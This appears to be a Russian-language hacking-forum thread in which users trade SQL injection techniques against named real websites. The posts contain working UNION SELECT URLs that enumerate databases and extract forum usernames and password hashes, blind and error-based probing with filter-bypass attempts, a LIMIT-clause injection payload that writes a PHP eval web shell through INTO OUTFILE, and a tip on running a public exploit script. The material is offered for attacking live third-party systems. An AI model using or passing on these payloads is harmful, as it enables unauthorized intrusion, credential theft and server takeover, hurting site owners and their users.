Поиск для чего на форуме!? Когда то было выполнение кода в админке, ща хз. https://forum.antichat.ru/threadnav189469-2-10-instant%2Bcms.html
ВОобщем смотрите http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,group_concat%28column_name%29,group_concat%28column_name%29,6,7+from+information_schema.columns+where+table_name=0x50524f46494c494e47%20-- Так Всё норм а делаю потом так http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,CPU_USER,5,6,7+from+PROFILING+--+ и нечего не получается =( в чём ошибака
http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,CPU_USER,5,6,7+from+information_schema.PROFILING+--+ Табла PROFILING - системная табла и в ней ничего полезного ты не найдешь, и она находится в счема information_schema. Поэтому перед таблой нужно написать счему откуда выводим.
KandidaT'S, давай выведем таблицы: Ну, а дальше выбирай таблицы и выводи колонки таким образом : table_name=TABLE_NAME в Hex виде. Hex вид можно получить тут Затем, как выведешь колонки, выводи данные так: Где TABLE_NAME - имя таблицы откуда выводим.
потому что там ничего нет, а вот это тебе будет интересней Code: http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,concat_ws(0x3a,username,user_password),5,6,7+from+xtremelabs_forums.phpbbforums_users+limit+1,1+--+
БД Code: http://xtremelabs.org/index.php?location=news&url=-1+union+select+1,2,3,GROUP_CONCAT%28SCHEMA_NAME%20SEPARATOR%200x3a%29%20,5,6,7%20FROM%20information_schema.SCHEMATA information_schema:xtremelabs_forums:xtremelabs_site:xtremelabs_tforums Tables Code: http://xtremelabs.org/index.php?location=news&url=-1+union+select+1,2,3,GROUP_CONCAT%28TABLE_NAME%20SEPARATOR%200x3a%29%20,5,6,7%20FROM%20information_schema.TABLES%20limit%200,1 Code: http://xtremelabs.org/index.php?location=news&url=-1+union+select+1,2,3,database%28%29%20,5,6,7%20FROM%20information_schema.TABLES%20limit%200,1 БД текущая -> xtremelabs_site -> 0x787472656d656c6162735f73697465 Code: http://xtremelabs.org/index.php?location=news&url=-1+union+select+1,2,3,GROUP_CONCAT%28TABLE_NAME%20SEPARATOR%200x3a%29%20,5,6,7%20FROM%20information_schema.TABLES%20WHERE%20TABLE_SCHEMA=0x787472656d656c6162735f73697465 admins:articles:articlescategories:categories:news:newscategories там нет таблицы PROFILING, она в другой БД. Code: http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,TABLE_SCHEMA%20%20,5,6,7+from+information_schema.TABLES+where+table_name=0x50524f46494c494e47%20-- information_schema она в схеме Code: http://xtremelabs.org/index.php?location=news&url=-1+union+select+1,2,3,%20count%28*%29%20,5,6,7%20FROM%20information_schema.PROFILING она пустая, там ниче нет.
копипась моего поста, не помню где он. Joomla_1.5.15-Stable-Full_Package.zip у себя проверял Code: http://localhost/lastjoom/index.php?limitstart=-5 может поможет.
э хз как обойти в таком раскладе, может подскажем: http://localhost/script.php POST ref=BIG' что не пробовал на все одинаков ответ (( You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 3 Что за трабла тут со скобками?
ref=BIG') and 1=0 по идеи должен съесть но ничего из БД не выдать. ref=BIG') and 1=1 а так выдать ref=BIG') order by 10000 -- по идеи тоже должно сработать выдать Unknown column '10000' ну а дальше ты понял, и если у тебя на локалке, то привел бы код из скрипта, который обрабатывает переменную $_POST['ref'] и делает с ней запрос в БД
Кто компилил сие чудо под gcc ? http://inj3ct0r.com/exploits/7595(паблик).Выдаёт кучу синтаксических ошибок.Разумеется,SunOs 5.10/5.11
Его компилировать не надо, вроде, это sh скрипт. Создай файл, закинь в него содержимое сплойта, и запусти ./exploit.sh
Вообще то вот так выглядит запрос по настояшему: Code: [B]script.php?Sex=female&YearFrom=18&YearTo=40'[/B] а ответ: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'+1 YEAR) AND upApproved = '1' LIMIT 1' at line 3 на тот же Code: script.php?Sex=female&YearFrom=18&YearTo=40') order by 1000-- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') order by 1000--+1 YEAR) AND upApproved = '1' LIMIT 1' at line 3 пробовал разные варианты и floor rand не пашет (( PS.так как линк крупный не постил тут. Прошу помочь если у кого есть идеи
Друзья, по всей видимости есть уязвимость на одном сайте: http://site.com/feedback/index/20' при этом вижу ошибку: A Database Error Occurred Error Number: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%27, 10' at line 6 SELECT * FROM (`guestbook`) WHERE `parent` = 0 AND `moderated` = 1 ORDER BY `id` DESC LIMIT 20%27, 10 Первый раз столкнулся с таким типом sql-injection и тольком не получается ничего раскрутить. Как действовать в таком случае, подскажите?!
Инъекция в лимите. В данном случае инъекция не возможна из за присутствия order by. Если нет order by, то крутиться, как обычно, через union select Если позволяют условия, то попробуй сразу залить шелл: 1 limit 1 into outfile '/path/shell.php' lines terminated by "<?php eval($_GET[cmd]);?>" -- 1 limit 1 into outfile '/path/shell.php' fields terminated by '' optionally enclosed by "<?php eval($_GET[cmd]);die();?>" --
вот тоже интересный случай: http://www.asiafuns.com/search_results.php?country=163+and+substring%28version%28%29,1,1%29=5+--+ все нормуль http://www.asiafuns.com/search_results.php?country=163+and+ascii%28substring%28%28select+column_name+from+information_schema.columns+limit+1,1%29,1,1%29%29%3E0+--+ редиректит на главную тоже самое если пробовать union select http://www.asiafuns.com/search_results.php?country=163+order+by+3+--+ норм http://www.asiafuns.com/search_results.php?country=163+union+select+1,2,3+--+ редирект попытки обхода с сменой регистра и добавлением комментариев /*!union+select*/ не проходит. в какую сторону копать?
